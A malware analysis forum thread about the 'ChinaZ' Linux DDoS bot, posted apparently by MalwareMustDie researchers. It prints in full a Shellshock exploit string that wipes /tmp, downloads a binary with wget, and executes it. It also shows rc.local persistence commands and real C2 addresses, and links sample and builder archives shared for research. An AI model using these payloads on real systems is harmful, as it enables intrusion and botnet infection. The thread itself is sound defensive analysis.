A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #24936  by unixfreaxjp
 Tue Jan 13, 2015 5:31 pm
The ELF's VT is: https://www.virustotal.com/en/file/92fd ... /analysis/
Out initial draft report: https://pastebin.com/raw.php?i=gf4xrB9n
This threat was detected just recently, via attacks via shellshock:
Code: Select all
/bin/bash -c \"rm -rf /tmp/*;echo wget http://xxxx:81/9521 -O /tmp/China.Z-gxak\x80 >>
 /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gxak\x80 >>
/tmp/Run.sh;echo /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;
chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget
 http://xxxx:81/9521 -O /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo /tmp/China.Z-gxak\x80 >>
/tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" 
The above request was reported to be generated from Windows version of the shellshock scanner binary with the below trace:
VT is: https://www.virustotal.com/en/file/ae67 ... /analysis/ < noted: LOW detection..
Code: Select all
.rdata:0057D808 aBinBashCRmRfTm db '() { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget %s -O /tmp/China'
.rdata:0057D808                                         ; DATA XREF: StartAddress+124o
.rdata:0057D808                 db '.Z-%s >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chm'
.rdata:0057D808                 db 'od 777 /tmp/China.Z-%s >> /tmp/Run.sh;echo /tmp/China.Z-%s >> /tm'
.rdata:0057D808                 db 'p/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Ru'
.rdata:0057D808                 db 'n.sh;/tmp/Run.sh"',0
The ELF payload was served in a hacked windows system served this ELF with the HFS server:
Image

The calls, subs & function name is obfuscated, yet some new uniq typical characteristics can be spotted like below for the detection purpose:
Image

Image

Image

registration for the autostart is using /etc/rc.local modification:
Code: Select all
sed -i -e '/exit/d' /etc/rc.local
sed -i -e '2 i//ChinaZ' /etc/rc.local
It hammered SE Linux, using hosts.conf - resolve.conf - and libnss as DNS resolver, and generated the backdoor is as per below, noted: not necessarily using hostname basis.
Code: Select all
SYSCALL5A, send(3, "cM\1\0\0\1\0\0\0\0\0\0\2aa\5gm352\3com\0\0\1\0\1", 30, MSG_NOSIGNAL)
SYSCALL5B, recvfrom(3, "cM\201\200\0\1\0\1\0\5\0\5\2aa\5gm352\3com\0\0\1\0\1\300\f"..., 1024, 0, 
           $PARAMS:{sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("202.238.95.24")}, [16]) 
SYSCALL5C, connect(3, {sa_family=AF_INET, sin_port=htons(9521), sin_addr=inet_addr("121.12.173.173")}, 16)
SYSCALL5D, write(3, "\0\0\0\0Linux2.6.2-4-686-\0\275w\267\0\1\0\0"..., 168) = 168
In this particular sample it calls CNC in aa.gm352.com (121.12.173.173:9521) at ASN 58543 | 121.12.168.0/21 | CHINATELECOM-HUNAN-H
Code: Select all
$ my_lookup aa.gm352.com
aa.gm352.com.           300     IN      A       121.12.173.173
gm352.com.              3600    IN      NS      ns4.he.net.
gm352.com.              3600    IN      NS      ns3.he.net.
gm352.com.              3600    IN      NS      ns2.he.net.
gm352.com.              3600    IN      NS      ns1.he.net.
gm352.com.              3600    IN      NS      ns5.he.net.
 
$ mycnccheck 121.12.173.173:9521
Connection to 121.12.173.173 9521 port [tcp/*] succeeded!
IPv4   TCP MMD.KickUR.ASS:36555->121.12.173.173:9521 (ESTABLISHED)
Image

Due to the unique new infection pair shellshock (scanner-payload), new functions & new signature used, we consider this is a new China DDOSer variant: "ChinaZ"
#MalwareMustDie!
*) Threat found by B of MMD ELF Team
Attachments
7z/infected
(890.82 KiB) Downloaded 120 times
 #24982  by unixfreaxjp
 Sat Jan 17, 2015 8:58 pm
The modular version of the ChinaZ in dynamic ELFs (w/shared libs).
Detection ratio is literally ZERO for these modules:
DDoSClient:
https://www.virustotal.com/en/file/b540 ... /analysis/
https://www.virustotal.com/en/file/a86b ... 421490630/
DDosStarter:
https://www.virustotal.com/en/file/daaa ... 421491358/
https://www.virustotal.com/en/file/daaa ... 421491358/

Analysis is in MMD blog: http://blog.malwaremustdie.org/2015/01/ ... ml#modular
Please credit #malwaremustdie for this findings.
Attachments
pwd/infected
(135.05 KiB) Downloaded 70 times
 #24989  by unixfreaxjp
 Sun Jan 18, 2015 7:06 am
I am sorry to write this in the ELF threat, it is so related to the post in http://www.kernelmode.info/forum/viewto ... 682#p24982
Windows version of the ChinaZ client attacker is also spotted in a set of ELF samples.
Image
I wrote the summary of my reversing in VT: https://www.virustotal.com/en/file/714e ... /analysis/
#MalwareMustDie!
Attachments
7z/infected
(35.92 KiB) Downloaded 76 times
 #25132  by ilaloyka
 Mon Feb 02, 2015 12:01 pm
I don't get the malware which shared by you. How to get the malware. I'm sorry.
Hi, What does it mean `DDosWorksServerEeCodeKey` in 8048194
 #26220  by unixfreaxjp
 Wed Jul 01, 2015 1:07 pm
Linux/ChinaZ.DDoS binary builder for x32/x64 (and Win x32) is shared in here for raising the detection ratio of the threat, for research and mitigation purpose.
WARNING! This is not a toy for fun, but a crimeware tool, using this online w/o good handling can create damage on any service will violate the law and can cause your internet service will be blacklisted or worse blocked, so the risk is all yours. Please analyze it in your test environment only.

Please read analysis in MalwareMustDie for the more info and the source of the threat: http://blog.malwaremustdie.org/2015/06/ ... es-on.html
VT=NULL: https://www.virustotal.com/en/file/59e6 ... /analysis/
Image

Snapshot:
Image

Builder Interface:
Image

Binary templates:
Image

Binary ELF templates contains ChinaZ github codes:
Image

We can not share the Win32 template (N/A) & CNC tools (forbidden by law, it'll be beyond research category for openly shared, I can go to jail), please contact in PM with your detail info to record the share. Sorry for the bummer, please bear with the safety procedure. For the snapshot of CNC tool are in MMD post, VT: https://www.virustotal.com/en/file/8b58 ... /analysis/

#MalwareMustDie's work & share to anti malware community.
Attachments
7z / infected
(1.54 MiB) Downloaded 78 times
 #26494  by unixfreaxjp
 Tue Aug 11, 2015 6:52 am
Attachments
7z/infected
(967.15 KiB) Downloaded 54 times